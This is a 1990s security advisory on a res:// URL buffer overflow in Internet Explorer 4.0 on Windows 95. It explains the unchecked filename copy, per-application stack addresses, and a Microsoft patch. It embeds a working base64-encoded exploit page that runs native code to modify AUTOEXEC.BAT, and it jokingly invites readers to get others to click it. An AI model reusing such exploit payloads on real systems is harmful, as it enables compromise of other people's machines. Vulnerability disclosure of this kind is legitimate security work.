COMMAND
Microsoft Internet Explorer 4.0 Suite
SYSTEMS AFFECTED
Win 95
PROBLEM
DilDog from L0pht brought new L0pht Advisory. This one about IE4.
The Microsoft Internet Explorer 4.0 Suite, including all programs
supplied with it that read and/or process HTML from either local
machines, intranet machines, or remote internet machines are
subject to a buffer overflow in the HTML decoding process. The
buffer overflow can cause the application to page fault, or in the
worst case, execute arbitrary precompiled native code.
Example should be following :-)):
1. Copy the supplied HTML file(s) into a location that is
accessible via the target application.
2. Point to it. Look at it.
3. Click on the link. (or let someone click it for you)
4. Become aware of what happens to your machine.
5. Freak out and beg Microsoft to make the bad man stop.
The problem here lies in the deciphering of the URL line format
itself. The base HTML library that is used by the Internet
Explorer 4.0 Suite and the following programs are vulnerable:
- Outlook Express (both mail and news)
- Windows Explorer
- Internet Explorer (different than regular explorer, really)
This problem, because it stems from a programming flaw in the HTML
decoding system, is unaffected by the Explorer "Security Zones"
feature. In other words, if you turn on the highest security
level for the zone from where the exploit HTML is being viewed,
you are still vulnerable.
The critical problem here is a buffer overflow in the parsing of a
particular new type of URL protocol. The "res://" type of URL is
meant to allow access to a local resource embedded in a local DLL
file. This is useful for archiving entire websites into a DLL and
is not, in its truest concept, a security flaw.
For example, to read something out of the IE4.0 Tour (stored in a
DLL) try the following URL:
res://ie4tour.dll/page1-6.htm
The buffer overflow is on the actual filename specified. To crash
your machine go ahead and try res://blahblahblah ... blahblah/ in
your Internet Explorer window where the amount of 'blah' equals
265 characters.
The function that goes through the filename and validates it is
flawed on Windows 95. Without checking the length, the filename
is uppercased, concatenated with '.DLL' if it isn't there already,
and in the process, copied into a fixed size buffer.
When constructing the exploit we want to try something useful.
Lets's start with appending text of your choice to AUTOEXEC.BAT...
(note that running native code lets you do pretty much anything
you want). Note that the location of the exploit string in the
stack is very important and it varies from target application to
target application. Constructing the exploit string:
Figure out stack location for exploit code...
App Loc
Internet Explorer 0x0057C144
Windows Explorer 0x0088A0F4
...
Even though those locations have null bytes in them and you can't
put those (or lowercase letters, or CR/LF or 0x07 or anything like
that) in the exploit string... but let microsoft fix that for us.
Step thru the process to see IE add that extra null character for
you. Put together what you wanna do, tack on the necessary jump
addresses and all that. That's it. Combining this with the
recent P5 bug could be interesting game.
Make sure you run this exploit with _internet_ explorer, _not_
regular ol' windows explorer. (put it on a website and download
it or click on the IE desktop icon (run iexplore.exe) and type in
the name of the file into the URL line) it won't work otherwise!!
(though it could be made to do so). Exploit code follows:
Message-ID: <879300274@random-pc>
Mime-Version: 1.0
Subject: exploit code
Content-Type: multipart/mixed; boundary="-"
This is a MIME-Encoded message, created by ESS-Code. It can be decoded
with MUNPACK, ESS-Code, or any other MIME-Capable software package. MUNPACK
is available VIA anonymous FTP on ftp.andrew.cmu.edu in the pub/mpack/
directory.
---
Content-Type: application/octet-stream; name="infect.htm"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="infect.htm"
Content-MD5: VCpTncmdwZrOcMtqXQdaEA==
PGh0bWw+DQo8aGVhZD4NCjx0aXRsZT4NCkludGVybmV0IEV4cGxvaXRlcg0KPC90aXRsZT4N
CjwvaGVhZD4NCjxib2R5IGJnY29sb3I9I0ZGRkZGRiB0ZXh0PSMwMDAwMDA+DQoNCjxjZW50
ZXI+DQo8aDE+V2hhdCBkbyBJIHdhbnQgdG8gaW5mZWN0IHRvZGF5PzwvaDE+DQoNCkNsaWNr
IGhlcmUgdG8gbW9kaWZ5IGF1dG9leGVjLmJhdDxwPg0KDQo8YSBocmVmPSINCnJlczovL7jE
QdiALYCAgICQkJCQkJCL2DPJgMGqA9mxX4oTgOJ/iBND4vaQkJCQkFCQkGoCkJCQuu3CWAGB
6gEBAQGQUru38ve/gO+A/9NaWlCQkDPbswJTg+sEU1C74ID5v//Tg+wMkFhQM9uzOVO7DNLn
EIHrEBCQEFNQu7DK+b//04PEDJCQkJC7z4D5v//TkJCQu7Cv+L//05CQkMzMLS0tLS0tLS0t
LS0tLUM6XEFVVE9FWEVDLkJBVICNikVDSE8gTUlDUk8kT0ZUIDBXTlogWU9VLi4uIFJFUEVO
VCBBTkQgQkUgU0FWRUQhjYpQQVVTRY2KgC0tLS0tLS0tLS0tLS0tLS1BQUFBQkJCQkMBIL6/
RERERUTBVy8NCiI+DQo8Zm9udCBmYWNlPSJXaW5nZGluZ3MiIHNpemU9KzY+/zwvZm9udD48
Zm9udCBzaXplPSs2Pj08L2ZvbnQ+PGZvbnQgZmFjZT0iV2luZ2RpbmdzIiBzaXplPSs2PiZn
dDwvZm9udD4NCjwvYT4NCg0KPC9jZW50ZXI+DQoNCjwvYm9keT4NCjwvaHRtbD4NCg==
-----
It has been proven and demonstratedthat the pentium bug CAN and
WILL be exploited through www-pages with the IE res:-bug:
http://www.ee.surrey.ac.uk/Personal/L.Wood/IE4res/
Please be adviced that this may hang your machine.
SOLUTION
Microsoft released a patch for the buffer overflow in Win95 with
regard to res:// type URLs:
http://www.microsoft.com/ie/security/?/ie/security/buffer.htm
The patch will be to the mshtml control which is the core of
Internet Explorer and is what the other applications mentioned by
l0pht will be using. Hence the patch to IE will fix the other
apps.